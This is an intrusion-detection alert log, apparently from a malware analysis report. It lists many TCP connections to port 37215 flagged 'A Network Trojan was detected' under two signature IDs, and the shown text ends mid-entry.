          Timestamp:05/28/24-14:47:08.752885
          SID:2835222
          Source Port:58156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.471274
          SID:2835222
          Source Port:41994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213755
          SID:2829579
          Source Port:46562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921030
          SID:2835222
          Source Port:34098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.607930
          SID:2829579
          Source Port:40494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914774
          SID:2835222
          Source Port:52672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597741
          SID:2835222
          Source Port:44526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426577
          SID:2835222
          Source Port:43174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.237487
          SID:2835222
          Source Port:42526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960677
          SID:2829579
          Source Port:54706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803302
          SID:2835222
          Source Port:42828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591396
          SID:2829579
          Source Port:50674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160839
          SID:2829579
          Source Port:44464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728951
          SID:2835222
          Source Port:55380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953885
          SID:2829579
          Source Port:51768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.937918
          SID:2829579
          Source Port:56048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475915
          SID:2835222
          Source Port:57222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742419
          SID:2829579
          Source Port:35240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843060
          SID:2829579
          Source Port:33898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562212
          SID:2829579
          Source Port:46750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484599
          SID:2829579
          Source Port:35942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657121
          SID:2835222
          Source Port:53688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266277
          SID:2829579
          Source Port:39834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.475343
          SID:2835222
          Source Port:38754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175624
          SID:2835222
          Source Port:53348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125586
          SID:2835222
          Source Port:57046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356242
          SID:2829579
          Source Port:35676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656657
          SID:2835222
          Source Port:55218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042392
          SID:2835222
          Source Port:57308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272687
          SID:2829579
          Source Port:55628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216589
          SID:2829579
          Source Port:52790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298749
          SID:2829579
          Source Port:41550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.067643
          SID:2829579
          Source Port:35326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299754
          SID:2835222
          Source Port:58188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782269
          SID:2835222
          Source Port:55062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322769
          SID:2835222
          Source Port:41682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.114466
          SID:2829579
          Source Port:37948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329582
          SID:2835222
          Source Port:39504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590535
          SID:2829579
          Source Port:41214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849960
          SID:2829579
          Source Port:40934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960287
          SID:2829579
          Source Port:57910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.119143
          SID:2829579
          Source Port:41802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324090
          SID:2829579
          Source Port:60758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216336
          SID:2835222
          Source Port:42462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848491
          SID:2835222
          Source Port:43470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665205
          SID:2829579
          Source Port:40318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551782
          SID:2829579
          Source Port:38106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598624
          SID:2835222
          Source Port:51252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.691210
          SID:2829579
          Source Port:38132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266421
          SID:2829579
          Source Port:45616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431338
          SID:2835222
          Source Port:45932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269801
          SID:2829579
          Source Port:49978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684336
          SID:2835222
          Source Port:53730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755704
          SID:2835222
          Source Port:54938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441627
          SID:2829579
          Source Port:37630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485711
          SID:2835222
          Source Port:35340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102962
          SID:2835222
          Source Port:39074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.889432
          SID:2829579
          Source Port:52340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671874
          SID:2835222
          Source Port:59532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399964
          SID:2829579
          Source Port:43144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.733015
          SID:2835222
          Source Port:38626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474382
          SID:2829579
          Source Port:49638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590508
          SID:2835222
          Source Port:41566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891527
          SID:2829579
          Source Port:49322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403221
          SID:2829579
          Source Port:42322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.798211
          SID:2829579
          Source Port:36784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.246434
          SID:2835222
          Source Port:52976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684652
          SID:2829579
          Source Port:32918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840058
          SID:2835222
          Source Port:48394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849238
          SID:2835222
          Source Port:43834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941290
          SID:2829579
          Source Port:53406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298071
          SID:2835222
          Source Port:40514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269635
          SID:2835222
          Source Port:49406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337444
          SID:2835222
          Source Port:56812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325422
          SID:2829579
          Source Port:57668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.138236
          SID:2835222
          Source Port:57284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959632
          SID:2829579
          Source Port:51790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665631
          SID:2829579
          Source Port:50712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.084860
          SID:2835222
          Source Port:53618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039069
          SID:2829579
          Source Port:52970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486258
          SID:2835222
          Source Port:44720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914188
          SID:2835222
          Source Port:56778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299546
          SID:2829579
          Source Port:51984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277624
          SID:2829579
          Source Port:48118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847619
          SID:2829579
          Source Port:58400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861701
          SID:2835222
          Source Port:43966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770602
          SID:2829579
          Source Port:44848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665388
          SID:2835222
          Source Port:51662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.371465
          SID:2829579
          Source Port:53692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594230
          SID:2829579
          Source Port:38054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794383
          SID:2829579
          Source Port:36190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794144
          SID:2829579
          Source Port:56692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480911
          SID:2829579
          Source Port:39802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266290
          SID:2829579
          Source Port:36282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297376
          SID:2835222
          Source Port:60702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724172
          SID:2829579
          Source Port:43546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.331559
          SID:2829579
          Source Port:38660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651282
          SID:2829579
          Source Port:40572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.278054
          SID:2835222
          Source Port:34480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.298228
          SID:2829579
          Source Port:53816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487539
          SID:2835222
          Source Port:57760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201502
          SID:2829579
          Source Port:45838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590714
          SID:2835222
          Source Port:38504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664580
          SID:2835222
          Source Port:33954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.920050
          SID:2829579
          Source Port:54464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.284404
          SID:2829579
          Source Port:59408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476398
          SID:2829579
          Source Port:33132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876416
          SID:2835222
          Source Port:46926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962532
          SID:2835222
          Source Port:33524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066585
          SID:2835222
          Source Port:50798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.699111
          SID:2835222
          Source Port:35522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689102
          SID:2829579
          Source Port:56026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324726
          SID:2829579
          Source Port:41120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297277
          SID:2829579
          Source Port:51002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985230
          SID:2829579
          Source Port:36082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980299
          SID:2829579
          Source Port:45264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431594
          SID:2829579
          Source Port:48180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341127
          SID:2835222
          Source Port:51334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977926
          SID:2829579
          Source Port:37674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492933
          SID:2835222
          Source Port:45854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298924
          SID:2835222
          Source Port:33328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666628
          SID:2835222
          Source Port:36086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222474
          SID:2835222
          Source Port:54246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111690
          SID:2835222
          Source Port:40486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201810
          SID:2835222
          Source Port:44754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842137
          SID:2829579
          Source Port:39234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771994
          SID:2829579
          Source Port:57840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892831
          SID:2829579
          Source Port:59376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793399
          SID:2835222
          Source Port:35822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272755
          SID:2829579
          Source Port:33288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183224
          SID:2835222
          Source Port:44098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325335
          SID:2835222
          Source Port:59816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.526473
          SID:2835222
          Source Port:45016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039597
          SID:2835222
          Source Port:36222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177995
          SID:2829579
          Source Port:46380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400628
          SID:2835222
          Source Port:51938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588704
          SID:2835222
          Source Port:59546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845775
          SID:2829579
          Source Port:54380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847560
          SID:2829579
          Source Port:46198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066054
          SID:2835222
          Source Port:57886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487505
          SID:2829579
          Source Port:50970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535562
          SID:2835222
          Source Port:59188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123859
          SID:2835222
          Source Port:43940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591763
          SID:2835222
          Source Port:37490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.908952
          SID:2829579
          Source Port:33810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.338034
          SID:2835222
          Source Port:36382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144051
          SID:2835222
          Source Port:37714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226167
          SID:2835222
          Source Port:40708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807442
          SID:2829579
          Source Port:46976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989164
          SID:2835222
          Source Port:42510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215662
          SID:2829579
          Source Port:57102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268007
          SID:2829579
          Source Port:36514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157464
          SID:2835222
          Source Port:56558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474239
          SID:2829579
          Source Port:56002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736671
          SID:2835222
          Source Port:42154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369105
          SID:2829579
          Source Port:40218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.759181
          SID:2835222
          Source Port:50110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.609550
          SID:2829579
          Source Port:52240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090597
          SID:2829579
          Source Port:44570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213871
          SID:2829579
          Source Port:38832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062215
          SID:2829579
          Source Port:47430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.340941
          SID:2835222
          Source Port:36910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.863251
          SID:2829579
          Source Port:42796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.863293
          SID:2835222
          Source Port:50196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656300
          SID:2835222
          Source Port:58272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291803
          SID:2829579
          Source Port:51682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215687
          SID:2835222
          Source Port:46618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.243753
          SID:2829579
          Source Port:59650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652239
          SID:2829579
          Source Port:44296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116821
          SID:2829579
          Source Port:52690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985203
          SID:2835222
          Source Port:41428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209429
          SID:2829579
          Source Port:46568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103035
          SID:2835222
          Source Port:33684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195769
          SID:2829579
          Source Port:59704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215211
          SID:2829579
          Source Port:55884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.618493
          SID:2835222
          Source Port:48718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538879
          SID:2829579
          Source Port:54772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328108
          SID:2835222
          Source Port:47134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083464
          SID:2835222
          Source Port:38854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964441
          SID:2829579
          Source Port:58254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848347
          SID:2835222
          Source Port:55774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178490
          SID:2829579
          Source Port:45740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.677659
          SID:2835222
          Source Port:38892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797782
          SID:2829579
          Source Port:33114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535261
          SID:2835222
          Source Port:47526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664446
          SID:2835222
          Source Port:49130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741651
          SID:2829579
          Source Port:53108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907982
          SID:2829579
          Source Port:54166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.419915
          SID:2835222
          Source Port:60174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996113
          SID:2829579
          Source Port:37942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728739
          SID:2829579
          Source Port:36322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943224
          SID:2829579
          Source Port:37762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772028
          SID:2835222
          Source Port:33620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154192
          SID:2835222
          Source Port:33260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922472
          SID:2829579
          Source Port:36144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324288
          SID:2829579
          Source Port:33444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795844
          SID:2835222
          Source Port:45528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.301169
